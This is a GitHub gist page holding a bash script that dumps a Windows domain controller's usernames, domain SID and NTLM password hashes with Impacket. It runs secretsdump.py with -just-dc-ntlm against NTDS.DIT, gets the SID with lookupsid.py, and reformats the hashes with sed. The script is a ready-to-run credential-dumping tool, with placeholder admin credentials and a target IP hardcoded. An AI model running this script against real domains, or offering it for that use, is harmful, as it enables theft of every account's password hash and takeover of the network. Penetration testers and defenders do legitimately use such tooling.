Skip to content

Instantly share code, notes, and snippets.

@w0ltage

w0ltage/dusph.sh

Last active October 7, 2022 02:15
Show Gist options
  • Save w0ltage/b9d8643f7651533f7dbcbe65c4fbef74 to your computer and use it in GitHub Desktop.
Save w0ltage/b9d8643f7651533f7dbcbe65c4fbef74 to your computer and use it in GitHub Desktop.
Download ZIP
Shell & Python - Dumping Domain Controller Usernames, SID and Password Hashes with Impacket
Raw
dusph.sh
#!/bin/bash
IMPACKET_PATH=$HOME/Github/impacket
DOMAIN="domain.local"
USERNAME="Administrator"
PASSWORD="AwesomeAdmin16"
IP="10.0.3.100"
OUTPUT_FILENAME="creds"
# Change the hardcoded values in variables before using!
printf "[ DUMPING DATA FROM NTDS.DIT TO $OUTPUT_FILENAME.ntds ]\n"
python3 $IMPACKET_PATH/examples/secretsdump.py -just-dc-ntlm $DOMAIN/$USERNAME:$PASSWORD@$IP -outputfile $OUTPUT_FILENAME 1> /dev/null
printf "\n[ DUMPING DOMAIN SID ]"
SID=$(python3 $IMPACKET_PATH/examples/lookupsid.py $DOMAIN/$USERNAME:$PASSWORD@$IP | egrep -o 'S-[0-9]-[0-9]-[0-9]+-[0-9]+-[0-9]+-[0-9]+')
printf "\n[ DOMAIN SID IS $SID ]"
printf "\n[ ADDING SID DOMAIN TO THE RID ]"
printf "\n[ DELETING BLANK LM HASHES ]"
printf "\n[ DELETING ::: ]\n"
sed "s/:/:$SID-/1;s/:aad3b435b51404eeaad3b435b51404ee//g;s/::://g" $OUTPUT_FILENAME.ntds > formatted_$OUTPUT_FILENAME.ntds
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment